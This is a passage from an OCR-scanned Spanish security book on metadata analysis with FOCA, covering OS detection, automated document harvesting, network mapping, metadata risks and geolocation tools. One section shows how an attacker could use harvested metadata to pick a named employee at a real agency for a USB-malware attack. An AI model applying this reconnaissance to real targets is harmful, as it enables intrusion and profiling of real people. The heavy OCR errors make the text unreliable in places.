13.  PDFGreator  1.6.2  Windows  XP 

14.  Acrobat  Distillier  8.2.0 

15.  QuarkXPress  1.0 

16.  Acrobat  Distillier  8.2.5 

1 7.  Adobe  Illustrator  GS3 

18.  Free  Hand  10:  pi  el  wpstops  filter  LG 
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Con  esta  pequefia  lista  parece  evidente  que  no  debe  existir  una  politica  de  versiones  de  software 
ferrea  marcada  per  la  direccion  de  la  empresa,  ya  que  se  utiliza  una  importante  cantidad  de  software 
diferente,  con  multiples  versiones.  y  una  mezela  de  software  gratuito,  software  libre  y  software 
privative  eomereiaf  lo  que  podria  inducir  a  pensar  que  a! gun  usuario  de  la  empresa  podrfa  estar 
us  an  do  a!  gun  software  sobre  el  que  no  dispone  de  licencia  de  uso.  Para  lograr  recopilar  un  numero  de 
evidencias  suficiente  el  forense  tendria  que  descargar  todos  los  ficheros  publicados  en  la  web ,  para 
luego  proceder  a  analizar  sus  metadatas.  Este  proceso,  no  obstante,  puede  resullar  largo  y  tedioso,  lo 
que  sirve  como  motivacidn  para  introducir  el  siguiente  apart  ado  del  libro,  cn  el  que  se  muestra  edmo 
utilizer  FOCA  para  automatizar  este  tipo  de  tareas. 


2.  Information  gathering  con  FOCA 

Como  se  ha  estudiado  en  la  seccion  anterior,  la  herramienta  FOCA  es  capaz  de,  analizando  los 
metadatas  de  diferentes  tipos  de  ficheros,  extraer  informacidn  relativa  a  los  usuarios  que  han  creado 
y  editado  los  ficheros,  los  sistemas  operatives  que  se  utilizaron  en  la  edict  on  y  el  software  uti  lizados, 
ruias  locales  y  remotas,  carpetas  compartidas,  impresoras  en  red  e,  incluso,  informacion  sobre  las 
ACLs  de  la  red, 

En  cl  caso  del  sistema  operativo,  si  se  trata  dc  una  version  de  fichero  binario  de  Microsoft  Office  que 
utiliza  e struct uras  OLE ,  es  posible  recon ocer  siempre  que  sislema  operativo  se  utilize.  Dentro  de  esas 
estructuras  OLE,  eyisten  dos  bytes,  los  llamados  OSH  y  OSL  de  los  streams  Summary  In  format  ion  y 
DocumentSummarylnformation  que  guardan  la  informacidn  del  sistema  operativo,  Estos  dos  valores 
son  actual  izados  por  la  API  OLE  cada  vez  que  se  hace  uso  de  el  la. 


Sistema  operativo  /  Software 

Valor 

*  /  OpenOffice  * 

LO 

Macintosh  *  /  Microsoft  Office  * 

3.10 

Windows  NT  3. SI  /  Microsoft  Office  * 

3,51 

Windows  NT  4.0  /  Microsoft  Office  * 

4.0 

Windows  98 

4,1 

Windows  2000  /  Microsoft  Office  * 

5.0 

Windows  XP  /  Microsoft  Office  * 

5.1 

Windows  Server  2003  /  Microsoft  Office 

5.2 

Windows  Vista  |  Windows  Server  2008/ 

6.0 

Windows  7  /  Microsoft  Office  * 

6.1 

lmagen  02.12;  Tabla  de  valores  de  OSH  y  OSL  identificando  al  sistema  operativo. 

En  la  web  de  Microsoft  es  posible  encontrar  una  tabla  de  valores  de  OSH  y  OSL  para  las  ultimas 
versiones  de  los  sistemas  operativos  Windows.  Sin  embargo,  la  prueba  eon  muchos  documentos  nos 
llevd  a  descubrir  algunos  valores  mas.  Algunos  ban  si  do  encontrados  en  ficheros  Office  con  objetos 
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OLE  creados  con  MAC,  con  OpenOffi.ce  y  con  sistemas  mas  anliguos.  La  labia  resultantc  que  ha 
quedado  es  la  siguiente 

Como  se  puede  ver,  es  posible  saber  si  un  fichero  ha  sido  creado  con  OpenOffice  o  desde  un  MAC. 
ayudando  a  la  FOCA,  a  pesar  de  que  se  hayan  limpiado  los  metadatas  y  la  informacion  oculta  con 
utilidades  de  limpieza  de  ficheros  corno  (RFID  (Remove  Hidden  Data )  o  con  la  herramienta  de 
inspeccion  de  MS  Office  2007-2013  que  veremos  mas  adelante,  a  descubrir  el  sistema  operative  de 
un  fichero* 

Como  es  evidente,  esta  informacion  puede  resultar  muy  valiosa  en  la  fase  de  Information  gathering , 
o  Intelligence  gathering,  de  un  test  de  penetration.  Pero  tener  que  localizar  y  descargar  los  ficheros 
del  dominio  analizado  para  poder  extraer  sus  metadatas  puede  resultar  un  proceso  complicado  y 
lento,  por  lo  que,  desde  sus  primeras  versiones,  FOCA  pemiite  automatizar  estas  tareas. 

Para  comenzar  con  el  analisis  de  un  dominio  hay  que  crear  un  nuevo  proyeeto  introduciendo  el 
nombre  de  dominio  objetivo. 


Iniagcn  02.13:  Creadon  de  un  nuevo  proyeeto. 

Una  vez  creado  el  proyeeto,  es  posible  seleccionar  el  lipo  de  archivos  que  FOCA  va  a  tratar  de 
localizar  para  este  dominio.  Para  dlo  basta  eon  marcar  o  desmarcar  los  tipos  de  ficheros  deseados 
en  el  cuadro  de  extensiones. 
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Imagen  02,14:  Cuadro  dc  extend  ones, 

Ademas  de  ficheros  ofimaticos  de  la  suite  de  Microsoft  Office  lanto  en  formate  binario,  como  en 
formate  XML  (doc,  ppt,  pps,  xls.  docx,  pptx,  ppsx  y  xisx),  de  OpenOffice  (odt,  ods,  odg  y  odp)  y  de 
SiartOffice  (sxw,  sxc  y  sxi),  FOCA  es  capaz  de  localizar  los  siguientes  tipos  de  archives: 

1 .  PDF  (Portable  Document  Format  File) 

2.  wpd  (WordPerfect  Document) 

3.  svg  (Scalable  Vector  Graphics  File) 

4.  svgz  (archivo  SVG  eomprimido) 

5.  indd  (Adobe  InDe sign  Document) 

6.  rdp  (Remote  Desktop  Configuration  File) 

7+  ica  (Citrix  JCA  File) 

Aunque  no  aparezean  en  la  lisla,  hay  que  tener  presente  que  muchas  extensiones  de  Microsoft 
Office ;  Apple  iWork  o  documentos  PDF  para  el  intercambio  de  datos  tambien  son  analizables  por 
el  motor  que  Neva  incorporado  FOCA7  pero  no  estan  dentro  de  la  lista  de  ficheros  que  se  buscan 
automaticamente.  En  el  caso  de  querer  analizarlos  se  deberian  localizar  con  las  opciones  de  busqueda 
personal  izada  que  se  vera  mas  adelanle  en  el  libro.  Algunos  de  esos  fomiatos  deberan  ser  cambiados 
de  extension  antes  de  poder  ser  anahzados. 

El  siguiente  paso  es  seleccionar  los  motores  de  busqueda  que  FOCA  utilizara  para  tratar  de  encontrar 
ficheros  de  los  tipos  de  archives  que  ban  side  seleccionados  que  se  encuentren  publicados  en  Internet 
para  el  dominio  objetivo. 

La  razon  por  la  que  FOCA  permite  seleccionar  mas  de  un  buscador  es  que  estos  no  son  perfectos; 
ningun  buscador  es  capaz  de  encontrar  todos  los  documentos  publicados  de  un  detenu  made  dominio 
y  no  todos  loealizan  los  mismos  ficheros,  debido,  por  ejemplo,  a  las  implcmentaciones  que  realizan 
del  operador  FILETYPE,  el  analisis  de  binarios  o  los  archives  contenedores. 

Como  se  puede  ver  en  la  imagen  02.15,  realizando  una  busqueda  eombinada  se  aprovecha  la  potencia 
de  todos  ellos  y  es  posible  encontrar  el  maxi  mo  numero  de  los  documentos  publicados  en  la  weh. 


Capitulo  IL  An  alls  is  y  limpieza  de  Metadatas 


71 


Imogen  02.15:  Documentor  localizados  por  diferentes  motores  de  busqueda. 


Hay  que  mencionar  que  el  ejemplo  niostrado  en  la  figura  anterior  se  llevo  a  caho  antes  de  que 
Exalead  obligara  al  usuario  a  intro  dueir  un  captcha  por  cada  busqneda  realizada.  Por  tanto  en  la 
aelualidad  es  poco  recomendable,  por  lo  incomodo  que  resulta,  utilizar  este  buscador, 

En  los  capitulos  3  y  4  se  estudiaran  eon  detalle  todas  las  opciones  de  eonfiguracion  del  programa, 
que  penniten  personalizar  el  analisis  respecto  a  las  tecnicas  de  descubrimiento  de  la  red,  las  tecnicas 
de  fingerprinting  o  las  vulnerabilidades  que  trataran  de  descubrirse.  Por  el  momenta,  dado  que  este 
capitulo  esla  eentrado  en  el  analisis  de  metadatas*  se  dejaran  todas  esas  opciones  marcadas  por 
defecto. 

De  esta  forma,  una  vez  seLeccionados  los  tipos  de  flcheros  y  los  motores  de  busqueda,  tan  solo  es 
neeesario  pulsar  sobre  el  bo  ton  “Search  Alt  para  que  FOCA  comience  a  buscar  todos  los  documentos 
publicados  para  el  dominio  del  proyecto. 
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Imagen  02. 1 6:  Documentos  eneontrados  por  FOCA  para  un  dominto  objetivo. 

Como  puede  observarse  en  la  imagen  02.16,  para  cada  fichero  localizado  FOCA  niuestra  el  tipo  de 
arc  hi  vo,  su  direccion  Url+  -  que  utilizara  siemprc  eomo  elemento  comparador  para  no  descargar 
fieheros  duphcados  -  y,  si  se  selecciona  la  opcion  btUsar  el  metodo  HEAD  para  obtener  el  tamano 
de  los  fieheros”  en  la  pestafia  Metadatas  del  menu  Gpeiones,  el  programa  tambien  nos  informa  de 
su  tamano. 

Hacer  uso  de  la  opcion  de  HEAD  es  especial rnente  util  cuando  lo  que  se  quiere  es  hacer  una 
demostraeion  o  una  prueba  rapida.  Una  vez  que  se  tenga  la  lista  de  fieheros  descubiertos  con  FOCA , 
se  podra  ordenar  la  lista  por  tamanos  de  nienor  a  mayor  y  asi  descargar  solo  aquellos  que  tengan  un 
menor  peso. 

FOCA  realiza  todo  el  anaiisis  de  los  metadatas  que  contienen  los  fieheros  en  el  disco  duro  local, 
por  lo  que  es  necesario  descargar  los  fieheros  al  equipo  antes  de  poder  analizaflos  y  tener  suficiente 
espacio  disponible  para  guardarlos.  Una  vez  descargados  se  podran  anadir  todas  las  veces  que  se 
quieran  a  proyectos  de  FOCA  para  volver  a  ser  analizados  en  cualquier  momento. 

Para  descargarlos,  es  suficiente  con  pinehar  en  el  boton  derecho  sobre  cualquiera  de  los  fieheros 
loealizados,  Alii  se  selecciona  la  opcion  “ Download  Alt  para  descargar  todos.  En  la  pestana 
Metadatas  del  menu  Opel  ones  puede  elegirse  el  numero  de  fieheros  a  descargar  de  forma  simultanea 
para  que  el  usuario  pueda  adecuar  el  comportamiento  del  programa  a  los  recursos  de  memoria  y 
ancho  de  banda  de  los  que  disponga. 

En  la  version  Free  el  numero  de  fieheros  a  descargar  en  paralelo  esta  limitado  a  2,  mientras  que 
los  usuarios  de  la  version  Pro  pueden  escoger  el  numero  que  deseen.  Las  diieiencias  entre  las 
fimcionalidades  ofrecidas  por  una  y  otra  version  de  FOCA  se  analizan  en  detalle  en  el  capitulo  5. 
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Imagen  02.17:  Desc&rgar  todos  ]os  fichcros  locali/ados  para  un  dominio. 


Imagen  02.18:  Extras  r  los  metadatas  do  I  os  doe  u  memos  dessargados. 
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Si  se  desea  descargar  un  unico  fiehero  o  un  grupo  de  ellos,  tambien  se  puede  hacer,  simplemente 
mareandolos  y  dando  a  la  opcion  Download.  Una  vez  descargados  -  se  sabra  que  todo  ha  ido  bien  por 
el  punto  verde  en  la  columna  de  Downloaded  -  FOCA  podra  analizar  los  metadatas  de  cada  fiehero 
y  crear  una  entrada  para  cada  uno  de  elios  en  la  seccion  de  Documentos  del  panel  de  Metadatas , 
organ  izando los  por  tipo  de  arcliivo, 

Ademas,  tal  y  como  se  muestra  en  la  imagen  02. 1 9,  en  la  seccion  de  Resumen  de  Metadatas  FOCA 
organiza  en  categories  la  information  encontrada  en  todos  los  archives,  de  forma  que  es  posible  ver 
de  un  vistazo  todos  los  usuarios  que  se  ban  encontrado,  el  software  utilizado  para  su  creation,  las 
carpetas  com  parti  das  descubiertas,  etcetera. 


f=  Project  [”  Report  Tools  ^Options 

sj  Tasklist  ^  Plugins  ^  About 

S’  ■■  informatics  .gonzalonazareno  ,org 

&  m*  Network 

Attribute 

Value 

B  ^  Domains 

Rales 

Afl  software  found  (30)  -  Times  found 

Vulnerabilities 

OpenOffice 

2 

fi-lf';  Metadata 

Microsoft  Office 

5 

6-  ‘  Documents  (44/62) 

Acrobat  DistiHier  3.1  0 

1 

1  .doc  (4) 

PSenpt5.dll  Version  5.2.2 

2 

!  e-  "7:  pdf  <3S> 

Writer 

10 

OpenOffice  3.3 

2 

fr-rr  Metadata  Summary 

Impress 

5 

:  ^  Users  {19} 

|  Q  Folders  (10) 

OpenOffice  3.2 

6 

i  Printers  (0) 

Windows  NT  4.0 

t 

Software  PM\ 

GNU  Ghostscript  705 

1 

|-"H  Emails  (0) 

Pages 

5 

h  Operating  Systems  (3) 

Mac  OS  X  10.5.2  Quartz  PQFContext 

5 

3 -  Passwords  (0) 

OpenOffice  3.1 

2 

L  [1  Servers  (0) 

LaTeX  with  beamier  dass  version  3.07 

2 

pdf  TeX-1  40 10 

1 

LaTeXwtft  modemcv'  package 

1 

LaTeX 

1 

do  PDF  Ver  3.0  Build  253  (Windows  XP  x32) 

1 

OpenOffice  2.4 

2 

Microsoft  Office  XP 

2 

* 

Imagen  02.19:  Resumen  de  Metadatas * 

La  extraction  de  metadatas  se  hard  tambien  de  forma  completa  o  individual,  y  navegando  hacia  un 
documento  concrete  se  podra  ver  exactamente  toda  la  informacion  que  FOCA  ha  extraido  de  el  Por 
comodi  dad,  tambien  es  posible  abrir  el  documento  directamente  desde  FOCA  eon  la  opcion  "Open” 
disponible  on  el  menu  contextual  que  sale  al  hacer  die  con  el  boton  derecho  sobre  cl  archive  que  se 
esta  anal  izando 
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El  ultimo  pa  so  para  haeer  que  toda  la  in  form  ac  ion  de  metadatas  que  contienen  los  documentos 
descargados  por  FOCA  sea  analizada  de  forma  eficiente  consiste  en  analizar  los  metadatas  obtenidos 
con  el  fin  ultimo  de  poder  pintar  parte  de  la  red  de  la  organizaeion  de  la  que  se  ban  descargado  los 
archives. 


Esta  operacion  se  hace  seleecionando  la  opcion  "'Analize  Metadata”  que  se  encuentra  en  el  menu 
contextual  del  panel  de  documentos  o  directamente  desde  el  nodo  Metadata  en  el  drbol  del  panel  de 
la  izquierda  de  la  herramienfa. 

Con  esa  opetdn  FOCA  va  a  unir  toda  la  informacion  disponible  que  se  ha  obtenido  tratando  de 
recon ocer  que  documentos  han  si  do  creados  desde  el  mismo  equipo  y  que  servidores  y  clientes  se 
pueden  inferir  de  ellos. 
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Imaeen  02.20:  Anaiisis  de  metadatas. 


La  forma  en  la  que  FOCA  trabaja  es  sencilla.  Primero  creara  un  nodo  -  equipo  de  la  red  interna  -  por 
cada  documento  descargado.  Despues,  mirando  las  propiedades  que  tienen  los  documentos  en  los 
metadatas ,  tratara  de  recon  ocer  cuando  los  metadatas  son  lo  suficientemente  igualcs  para  que  se 
pueda  inferir  que  ambos  fueron  creados  desde  el  mismo  equipo.  Algunas  voces  se  podra  comprobar 
como  en  el  mismo  equipo  hay  diferentes  versiones  de  software,  lo  qiie  imp  lie  a  que  el  equipo  ha  si  do 
actualizado. 

Tras  rcalizar  este  anaiisis  FOCA  muestra  nueva  informacion  en  la  seccion  de  clientes  de  la  red, 
creando  una  entrada  para  equipo  descubierto,  donde  podemos  ver  su  Si  sterna  Operative,  los  usuarios 
que  han  podido  descubrirse  y  los  documentos  que  se  han  utilizado  para  inferir  esta  informacion. 
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Imogen  02.21:  C  Hemes  de  la  red. 

Si  hubieran  sido  descubiertos  servidores,  no  es  el  case  de  la  imagen  superior,  aparecerian  directamente 
bajo  el  nodo  Servers  del  arhol  de  Network  que  se  puede  ver.  Ademas,  si  se  hubieran  descubierto 
direcciones  IP  tambien  aparecerian  como  nodes.  Sobre  los  servidores,  ya  tengan  direction  IP  o  sean 
"L Allocate  Servers'*  -  servidorcs  sin  direccion  IP  ni  Fully  Qualyfied  Donum  in  Name  se  podran 
lanzar  una  serie  de  herramientas  desde  el  boton  derecho  del  raton  para  analizarlos,  como  escaneos 
de  segmentos  de  red,  o  utilidades  de  fingerprinting 

Preparando  un  ataque  dirigido  con  FOCA 

Con  el  objetivo  de  mostrar  el  tipo  de  aeciones  que  un  atacante  podria  llevar  a  cabo  con  la  in  form  a  cion 
que  FOCA  obtiene  al  analizar  los  metadatas  de  los  ficheros  publicados  en  un  dominio  objetivo,  se  va 
a  tomar  como  ejemplo  el  mayor  incidente  de  seguridad  sufrido  por  el  Pentagono,  que  se  produjo  al 
insertar  un  pendrive  en  un  portatil  de  uno  de  sus  trabaj adores  mientras  se  encontraba  en  una  mision 
en  Oriente  Proximo.  Este  pendrive  contema  un  eddigo  malic ioso  que  se  propago  sin  ser  detectado 
y  que  fue  capaz  de  transferor  dates  sobre  planes  de  operaciones  del  gobiemo  de  Estados  Unidos  a 
redes  extranjeras. 


Capital o  IL  Anal  is  is  y  limpieza  de  Metadatas 
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Pentagon  breached  by  foreign  hacker 

A  foreign  spy  agency  carried  out  the  most  serious  "cyber  attack"  on  the  US  military's 
networks  when  a  tainted  flash  drive  was  inserted  into  a  laptop  in  the  Middle  East, 
according  to  a  senior  Pentagon  official. 


By  Alex  Spitlius.  Washington 
Published:  9:43PM  BST  25  Aug  2010 


\  he  Pentagon  faces  regular  cyber  attacks  Photo;  GETTY 
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Imagen  02.22:  Nttticia  sobre  el  ataque  su  in  do  por  el  Pentdgono. 


Viendo  este  Lipo  de  ataques,  la  pregunla  que  puede  venir  a  la  mente  de  cualquier  es:  Re  sultana 
muy  comp  lie  ado  para  un  atacante  utiiizar  el  anahsis  de  metadatas  de  FOCA  para  preparar  un  ataque 
de  estas  earacteristicas?” 

Como  vamos  a  ver  en  este  case,  esto  no  seria  excesivamente  eomplejo.  El  objetivo  del  ataque  seria 
darle  un  pendrive  eon  una  pieza  de  malware  a  un  usuario  concreto  que  ha  sido  previamente  esludiado 
con  la  esperanza  de  que  una  vez  que  lo  tenga  en  su  poder  lo  coneete  a  su  equipo  de  trabajo  dentro 
de  la  organizacion. 

La  situation  ideal  seria  que  este  usuario  tuviera  un  si  sterna  operative  que  estu  viera  lo  menos 
protegido  posible  contra  los  ataques  basados  en  esquemas  de  autorun  en  pendrives  o  que  tuviera  un 
sistema  con  una  debilidad  conocida  previamente  por  el  equipo  atacante.  Ademas,  seria  interesante 
que  este  usuario  tuviera  aceeso  a  servidores  internes  de  la  organizacion  a  donde  se  pudiera  copiar  el 
malware  preparado  y  que  desde  ese  servidor  controlado  se  pudiera  infectar  al  resto  de  usuarios  de  la 
organizacion,  Un  esquema  clasico  de  /^Prbasado  en  pendrive. 
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2.  El  malware  se 
copia  en  l  as  carp  el  as 
com  part  idas 
esperando  infect  ar 
otros  orden  adores 


1.  El  usuario  objetivo 
inserta  el  pendrive  y  el 
malware  se  copia  en 
todas  las  carpet  as 
compartidas 


3.  Los  equipos  que  acceden  a 
estas  carp  etas  compartidas  son 
infectadosy  el  malware  se 
copia  en  nuevas  carpetas 
compartidas 


Irnagen  02.21:  Esquema  de  fun ctonam lento  del  ataque  diricido. 


Por  supuesto,  para  la  realization  de  cualquier  ataque  que  se  realiza  desde  fuera  de  la  organizacion, 
cuantos  mas  datos  pudieran  obtenerse  de  Jos  equipos  internes,  de  la  e  structure  de  la  red,  o  la  poll  tic  a 
de  gestion  de  sistemas  y/o  seguridad  del  objetivo,  mejor  se  podna  preparar  el  malware  a  mcdida.  Y 
como  vamos  a  ver,  un  atacante  podria  utilizar  FOCA  para  conseguir  esta  infbmiaeiom 

En  esta  parte  vamos  a  dejar  fuera  la  deteccion  del  software  antimalware  utilizado  por  la  empresa 
objetivo,  pero  utilizando  las  teenies s  de  DNS  Cache  Snooping  que  se  veran  mas  adelante,  sen  a 
posible  realizar  tambien  ese  trabajo. 

En  siguiente  ejemplo  se  muestra  an  easo  con  datos  reales  extraidos  de  un  determinado  dominio, 
en  concreto  de  la  Missile  Defense  Agenda  (www.mda.mil)  en  el  que  se  pretende  demostrar  como 
preparar  un  ataque  dirigido  de  estas  caracteristicas.  Para  clegir  el  objetivo  se  busearia  un  usuario  con 
un  Si  sterna  operative  Windows  XP  que  tenga  acceso  a  servidores  para  copiar  el  malware  que  se  va  a 
crear.  Analizando  los  metadatas  de  solo  125  archives  con  FOCA,  es  posible  dibujar  una  seccion  del 
mapa  de  la  red  La  persona  de  la  imagen  02.24  parece  un  buen  objetivo,  ya  que  tiene  acceso  a  dos 
servidores  distintos  y  se  dispone  de  su  nombre  y  apel lidos,  por  lo  que  su  ubicaeion  fisica  resultana 
mas  send  1  la. 


Capitulo  11.  Andlisis  y  limpieza  de  Metadatas 
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Jmagen  02,24:  Usuario  objetivo  con  acceso  arecursos  com  parti  do  s. 


Ademas,  los  servidores  a  los  que  el  usuario  tiene  acceso  parecen  bastante  interesantes,  pues,  tal 
y  como  puede  observarse  en  la  figura  02.25,  se  sabe  que  aeeeden  a  el  los  muchos  usuarios  y  se 
comparten  bastantes  carpetas,  por  lo  que  hay  muchos  silios  donde  copiar  el  malware  sin  llamar 
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En  este  caso  no  importa  si  los  servidores  son  intemos  y  no  tenemos  acceso  a  ellos  desde  fuera. 
Tampoco  importa  mucho  si  no  se  tiene  la  direction  IP  o  si  no  se  dispone  de  su  nombre  de  dominio 
DNS. 

El  equipo  del  usuario  que  sera  infectado  esta  dentro  de  la  red  y  se  puede  eoneelar  por  su  nombre 
NETBios  a  las  carp  etas  compartidas  de  los  servidores,  asi  que  es  suficiente  con  que  el  usuario  este 
trabajando  en  ese  equipo  para  que,  si  ha  eonectado  el  pendrive  al  equipo  en  algun  momento,  el 
ataque  tenga  exito. 

Toda  esa  information,  conio  se  puede  ver,  leyendo  documentos  publicos  de  una  organization  y  sin 
realizar  ningim  acto  que  pudiera  ser  cons  id  era  do  i  legal  en  la  toma  de  informacion. 


3.  Riesgos  asociados  a  una  mala  gestion  de  los 
metadatos 

Tras  analizar  en  el  capitulo  anterior  los  metadatas,  datos  perdidos  c  informacion  oculta  que  es 
posible  local  izar  en  diferentes  tipos  de  fieheros,  y  estudiar  en  este  capitulo  la  informacion  que  FOCA 
es  capaz  de  extraer  de  ellos  y  como  automatizar  estas  tareas,  se  puede  conclulr  que  son  varies,  y 
muy  importantes,  los  riesgos  a  los  que  una  organ  izaciou  podria  enfrentarse  al  no  realizar  una  gestion 
adecuada  de  los  metadatos . 

Una  lista  de  los  riesgos  de  seguridad  de  los  metadatos  a  tener  en  cuenta  seria: 

-  Es  posible  encontrar  relaciones  ocultas  entre  com  pah  (as  o  personas,  como  en  el  caso  dc 
la  minislra  de  cult  Lira  espahola  que  trabajaba  en  la  sociedad  DAM  A ,  sociedad  que  publico  en 
su  web  documentos  que  se  habian  redactado  con  una  liceneia  de  la  SGAE ,  mostrando  la  clara 
relacion  entre  ambas  entidades. 

-  Se  pueden  detectar  casos  de  piraterfa  de  software^  al  descubrir  que  un  documento  de  una 
empresa  se  ha  generado  con  un  software  del  que  no  ha  adquirido  la  liceneia. 

Puede  estudiarse  !a  historia  de  ios  documentos,  viendo  cuando  y  quien  ha  realizado 
m odd icaci ones,  como  en  el  caso  de  Toni  Blair  y  cl  documento  de  las  armas  de  destruction 
masiva  en  Irak. 

-  Puede  localizarse  informacion  tactica  para  estudiar  posibles  objetivos  de  ataques  y 
adquirir  conocimiento  in  tern  o  de  una  compania,  como  se  ha  mostrado  con  el  ejemplo  del 
ataque  dirigido  al  Pentdgono. 

Y  se  pueden  trazar  eventos,  posieionandolos  tanto  en  tiempo  como  en  espacio,  como 
ocurrio  en  varies  de  los  ejernplos  de  casos  forenses  estudiados  en  la  primer  a  section  del 
capitulo.  En  esta  misma  linea  se  va  a  analizar  a  continuation  el  funcionamiento  de  dos 
apl  icaciones  web  muy  interesantes  que  hacen  uso  de  los  metadatos  con  el  fin  de  local  izar  y 
posicionar  a  personas,  como  son  Creepy  y  Stolen  Camara  Finder. 


Capitulo  II.  Andlisis  y  limpieza  de  Metadatas 
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Creepy 

El  objetivo  de  la  aplicacion  Creepy5  es  demostrar  lo  faeil  que  resulta  seguir  los  pasos  de  una  persona 
que  tenga  una  expos ici on  social  descuidada  en  Twitter. 

La  idea  es  lan  sencilla  como  recoger  la  informacion  de  posieionamiento  que  se  puede  sacar  de 
los  tweets  o  fotos  que  publica  un  usuario.  En  el  caso  de  Twitter,  es  posible  extraer  informacion  de 
posieionamiento  de  tweets  con: 

Informacion  GPS  cuando  se  hace  desde  determinados  clientes  para  tele  ton  os  moviles. 
Tweets  asoeiados  a  una  ubicacidn. 

-  Triangulacion  basada  en  la  IP  desde  la  que  se  hizo  el  tweet. 

Ademas,  al  estilo  de  la  aplicacion  weh  Please  Rob  Me 6  (que  permite  conocer  en  tiempo  real  todas 
aquellas  casas  que  se  ban  quedado  vacias  porque  sus  propietarios  se  han  ido  y  ban  tuiteado  que  estan 
en  otro  lugar  usando  la  web  Foursquare. com ),  Creepy  recoge  la  informacion  GPS  de  los  tweets 
que  vienen  desde  Four  Square  y  de  los  metadatas  EXIF  de  las  fotos  publieadas  en  los  servicios 
de  publication  de:  Flickr,  twitpic,  yfrog,  img.fy,  plixi,  twit rp  Lx,  Joleext,  shorn  ^  pickkur \  mo  by.  to, 
twits  naps  y  twitgoo. 

La  herramienta  perm  ite  buscar  y  seleccionar  una  cuenta  de  Twiter  o  Flickr  y  despues  extraer  toda 
la  informacion  GPS y  de  fechas  que  se  pueda  desde  esas  cuentas,  para  generar  una  base  de  datos  de 
visualization  de  coordenadas  por  fechas  que  ademas  puede  ser  exportada  en  formato  CSV  o  KMZ. 


Imagcn  02.26:  Creepy  anali/ando  la  informacion  GPS  de  las  fotos  dc  una  persona. 


5  II  TTPSit/g i  th  u  b .  c om/ i  leklroj  oh  n / Creepy 

6  H  7TP://plea sero bme.  com/ 
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Creepy ,  en  prineipio,  solo  saca  information  que  el  usuario  libremente  ha  pueslo  en  Internet,  y  que, 
al  generar  un  fie  hero  CSV  o  KMZ ,  puede  ser  compleinentada  eon  otras  fuentes  de  information 
que  se  consigan  del  objetivo  para  completar  una  buena  historia  de  un  usuario.  Hay  que  tener  en 
cuenta  que  el  registro  de  posicionamiento  GPS  se  haee  con  otros  servitios,  como  el  Google  Latitude 
que  algunos  publican  en  su  blog,  las  Geotags  que  usan  algunos  bloggers  para  publicar  sus posts, 
Facebook  Places  o  cualquier  otro  repositorio  de  fotografias  que  este  utilizando  ese  usuario. 


Stolen  Camara  Finder 

Stolen  Camara  Finder  es  un  servicio  web  que  se  usa  para  descubrir  a  los  ladrones  de  camaras 
di gi tales  por  medio  de  los  metadatas  que  lie  van  las  fotografias  tomadas  por  estas  camaras  y  acaban 
publicadas  en  Internet,  ya  sea  en  Twitter,  Facebook ,  histogram,  P interest,  Flickr  o  cualquier  otra 
red  social. 


Como  ya  sabemos,  las  fotografias  digitales  ulilizan  el  formato  EXIF  para  guardar  metal  oformaci  on, 
y  entre  otros  datos  almacenan  la  marea,  el  modelo  y  el  numero  de  serie  de  la  camara  con  la  que  se 
tomb  la  fotografla.  El  lector  puede  comprobar  como  Flickr  publica  las  imagenes  compartidas  por 
sus  usuarios  sin  eliminar  los  metadatas ^  que  estan  accesibles  para  cualquiera  que  descargue  una 
fotografla. 


Cuando  alguien  ha  pcrdido  su  camara  folografica  y  sospecha  que  ha  podido  ser  robada,  el  servicio 
Stolen  Camara  Finder  trata  de  encontrar  fotos  tomadas  por  su  camara  en  otras  ubicaeiones  de 
Internet,  para  lo  que  el  afectado  puede  arrastrar  una  fotografla  al  buscador  o  introducir  el  numero  de 
serie  manualmente. 


Foto/Exif 


iQuG  son  los  datos  Exif? 

Lot  aaKAExjrHNi  un  registra  de  ie  caret!  gure  0  dm  due 
una  cftmare  irtilaO  Bmar  U*a  tots  a  an  video.  Eeta 

Intorm&ofrn  ue  Inserts  en  I cs  arch i was  que  g-uaroa  ia 
cimajB,  v  nfaotrw  la  I  (Hi  to#  y  JiHWamH  aquF. 
AtSflCiOn:  Aigumoe  dates  Exif  eslan  diaponlMee.  per  el 
mameatf,  undrawn®  *fl  ingl**.  LO  seotimos. 


Fechas 


Tomada  el 

11  tie  iXjVwmb™,2Q11  a  las  4 .4Cpni  CET 

PuBlicada  en  Flickr 

14  de  rtxntaffltw^2Dll  ai4:ifl  pot 

datos  Exif 

Cdnrara 

Canon  EOS  55QD 

Q,033  hc  {1/3SJ 

Aperture 

Lsnle 

23  mm 

Ve  loci  dad  ISO 

200 

Tendered a  de  rntpovaOri 

OEV 

Flash 

NO  Flash 

hnagen  02.27:  ]ni'onmad6n  de  la  camara  folografica  en  los  metadatas  EXIF  de  una  foto. 


En  la  version  gratuita  tan  solo  es  posible  busear  una  camara  por  los  campos  de  numero  dc  serie,  pero 
en  1a  version  PRO  se  pueden  localizar  las  camaras  por  campos  mas  espetificos,  como  d  numero  de 
serie  de  las  lentes  o  los  valores  personal izados  en  los  campos  Copyright  o  Creator. 


7  //7TF://ww  w,  stolen  camera  finder.com/ 
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Flame  y  los  metadatos 

The  Flame,  fue  un  malware  catalogado  cortio  una  nueva  generacion  de  ciberarmas,  Fue  descubierto 
en  Mayo  de  2012  y  desde  su  descubrimiento  fue  llenando  las  portadas  de  los  sitios  de  noticias 
relacionadas  coo  la  seguridad  informat  ica  y  tambien  de  periodicos  y  telediarios  general istas,  ya 
que  se  trato  de  on  malware  orientado  a  paises  de  Orienle  Medio  que,  por  las  funcionaiidades  que 
incorporaba  y  por  su  nivel  de  especial  izacion  y  diversificacidn,  parecia  estar  dirigido  a  labores  de 
espionaje  e  Intel  igencia  militar. 

Sin  duda  se  trata  de  un  malware  con  un  grade  de  sofisti  cation  iecnica  muy  alto,  que  no  se  disperse 
a  discretion,  si  no  que  parecia  tener  unos  objetivos  claros,  ya  que  tan  solo  fue  local  izado  en  unos 
pocos  miles  de  equipos  de  Oriente  Medio  (Iran,  Israel,  Palestine  Sudan,  Siria,  Libano,  Arabia  Saudi 
y  Egipto)  y  que  esta  considerado  el  causante  del  ataque  informatieo  que  en  Abril  de  2012  provoco 
que  los  terminales  de  las  petroleras  irarnes  fueran  desconectados  de  Internet, 

Ad  etnas.  Flame  consiguio  permanecer  oeulto  durante  al  menos  5  afioss,  ya  que  el  malware  estaba 
firm  ado  por  Microsoft*  debido  a  que,  en  algun  momento,  un  atacanie  consiguio  manipular  un 
certificado  que  sc  usaba  para  liceneias  de  Terminal  Server  y  firmar  codigo  eon  el,  lo  que  ha  provocado 
